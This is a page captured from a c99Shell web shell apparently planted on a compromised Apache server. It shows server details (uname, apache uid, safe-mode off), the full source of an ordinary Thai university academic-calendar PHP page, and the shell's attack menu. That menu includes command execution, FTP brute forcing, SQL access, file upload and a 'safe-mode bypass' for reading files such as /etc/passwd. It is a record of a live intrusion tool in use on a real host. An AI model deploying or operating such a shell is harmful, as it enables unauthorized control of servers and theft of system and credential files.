!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showSchedule.php (9.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("admin_menu.php");
include_once 
"./link/function.php";
include_once 
"./class/clsAcadYearConfig.php";
include_once 
"./class/clsSchedule.php";
include_once 
"./class/clsSysSemesterDes.php";
include_once 
"global.php";
$conn = new Connection();

$oAy = new AcadYearConfig();
$oAy2 = new AcadYearConfig();
$oAy3 = new AcadYearConfig();
$oSc = new Schedule();
$oSe = new SysSemesterDes();
$oSe2 = new SysSemesterDes();
?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<table width="750" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td><br><fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Menu_Course.php">หน้าหลัก</a> <img src="picture/ico3.gif" align="absmiddle" border="0" /><a href="programs.php">หลักสูตรที่เปิดสอน</a> <img src="picture/ico3.gif" align="absmiddle" border="0" /><a href="course.php">รายวิชาที่เปิดสอน</a>  <img src="picture/ico3.gif" align="absmiddle" border="0" /></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="showDetailStudyPlan.php">โปรแกรมการศึกษา</a> <img src="picture/ico3.gif" align="absmiddle" border="0" /></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>">ปฏิทินการศึกษา</font></legend>
            <label><div align="center"><br><form name="pc" method="post" action="processSchedule.php"><table width="600" align="center" border="0" cellpadding="0" cellspacing="0">                
                <tr>
                  <td align="center"><div align="left"><font size="2" face="Tahoma"><img src="./picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font></div></td>
              </tr>
                <tr>
                    <td align="center"><font size="3" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>"><strong>ปฏิทินการศึกษา</strong></font></td>
                </tr>
                <tr>
                    <td height="22"></td>
                </tr>
                <tr>
                    <td><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>
<?php
                $oAy
->SearchByKey($GLOBALS["ACADYEAR"], $GLOBALS["SEMESTER"]);
                
$oAy->GetRecord();
?>                
                ปีการศึกษา : 
                <select name="acadYear"  onChange = "location.href ='<?php echo $PHP_SELF;?>?acadYear='+encodeURI(options[selectedIndex].value)">
<?php
                
if($acadYear==''){
?>
                <option value="<?php echo $oAy->acadYear;?>" selected><?php echo $oAy->acadYear;?></option>                
<?php
                
}else{
?>                
                <option value="<?php echo $acadYear;?>" selected><?php echo $acadYear;?></option>                
<?php
                
}
                
                
$oAy2->RSAcadYearConfigGroupAcY();
                while(
$oAy2->GetRecord()){
?>
                <option value="<?php echo $oAy2->acadYear;?>"><?php echo $oAy2->acadYear;?></option>
<?php                
                
}
?>                
                </select>                
                ภาคการศึกษา : 
                <select name="semester"   onChange = "location.href ='<?php echo $PHP_SELF;?>?semester='+encodeURI(options[selectedIndex].value)+'&acadYear='+acadYear.value">
<?php
                
if($semester=='' && $acadYear==''){
                    
$oSe2->SearchByKey($oAy->semester);
                    
$oSe2->GetRecord();                    
?>
                <option value="<?php echo $oSe2->semester;?>" selected><?php echo $oSe2->semester1."  ".$oSe2->semesterName;?></option>
<?php
                    
}else if($semester==''){
?>
                <option value="" selected>--เลือกภาคการศึกษา--</option>
<?php                    
                    
}else{
                    
$oSe2->SearchByKey($semester);
                    
$oSe2->GetRecord();                    
?>
                <option value="<?php echo $oSe2->semester;?>" selected><?php echo $oSe2->semester1." ".$oSe2->semesterName;?></option>
<?php
                    
}
                
                if(
$acadYear!='')
                    
$oAy3->RSAcadYearConfigByAcadYearGBSem($acadYear);                    
                else
                    
$oAy3->RSAcadYearConfigByAcadYearGBSem($oAy->acadYear);
                    
                while(
$oAy3->GetRecord()){
                    
$oSe->SearchByKey($oAy3->semester);
                    
$oSe->GetRecord();
?>
                <option value="<?php echo $oSe->semester;?>"><?php echo $oSe->semester1."  ".$oSe->semesterName;?></option>
<?php                
                
}
?>                
                </select>                    
                    </b></font></td>
                </tr>
                <tr>
                    <td><table width="600" border="0" cellspacing="0" cellpadding="0" bordercolor="<?php echo $GLOBALS["COLOR_BORDER_TABLE_1"];?>">
                        <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_2"];?>">
                            <td width="50%" height="22" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><strong>คำอธิบาย/ชื่อกิจกรรม</strong></font></td>
                            <td width="25%" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><strong>วันที่เริ่มต้น</strong></font></td>
                            <td width="25%" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><strong>วันที่สิ้นสุด</strong></font></td>
                        </tr>
<?php
                        
if($acadYear=="" && $semester==""){
                            
$oAy->SearchByKey($GLOBALS["ACADYEAR"], $GLOBALS["SEMESTER"]);
                        }else{
                            
$oAy->SearchByKey($acadYear$semester);                        
                        }
                        
$oAy->GetRecord();
                        
                        if(
$acadYear=="" && $semester==""){
                            
$oSc->SearchByKey($GLOBALS["ACADYEAR"], $GLOBALS["SEMESTER"]);
                        }else{
                            
$oSc->SearchByKey($acadYear$semester);                        
                        }
                        
$oSc->GetRecord();
?>
                        <tr>
                            <td height="22"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">วันเปิดภาคการศึกษา</font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->sDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->sDate));}?></font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">-</font></td>
                        </tr>
                        <tr>
                            <td height="22"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">ช่วงลงทะเบียนเรียน</font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->enrollSDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->enrollSDate));}?></font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->enrollEDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->enrollEDate));}?></font></td>
                        </tr>
                        <tr>
                            <td height="22"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">ช่วงเพิ่ม-ถอนรายวิชา</font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->addWithdrawSDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->addWithdrawSDate));}?></font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->addWithdrawEDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->addWithdrawEDate));}?></font></td>
                        </tr>
                        <tr>
                            <td height="22"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">ช่วงชำระค่าลงทะเบียนเรียน</font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->paySDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->paySDate));}?></font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->payEDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->payEDate));}?></font></td>
                      </tr>
                        <tr>
                            <td height="22"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">ช่วงสอบกลางภาค</font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->midExamSDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->midExamSDate));}?></font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->midExamEDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->midExamEDate));}?></font></td>
                        </tr>
                        <tr>
                            <td height="22"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">ช่วงสอบปลายภาค</font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->finalExamSDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->finalExamSDate));}?></font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->finalExamEDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->finalExamEDate));}?></font></td>
                      </tr>
                        <tr>
                            <td height="22"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">ช่วงส่งเกรดนักศึกษา</font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->finalExamEDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->finalExamEDate));}?></font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->sendGradeEDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->sendGradeEDate));}?></font></td>
                        </tr>                        
                        <tr>
                            <td height="22"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">วันปิดภาคการศึกษา</font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php if(fullDate(splitDateDb($oSc->eDate))==543){echo "-";}else{ echo fullDate(splitDateDb($oSc->eDate));}?></font></td>
                            <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">-</font></td>
                      </tr>                        
                    </table></td>
                </tr>
            </table>
            </form></div></label>
        </fieldset><br></td>
    </tr>
</table>
<?php
$oSc
->Destroy();
$oAy->Destroy();
$conn->Disconnect();

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0066 ]--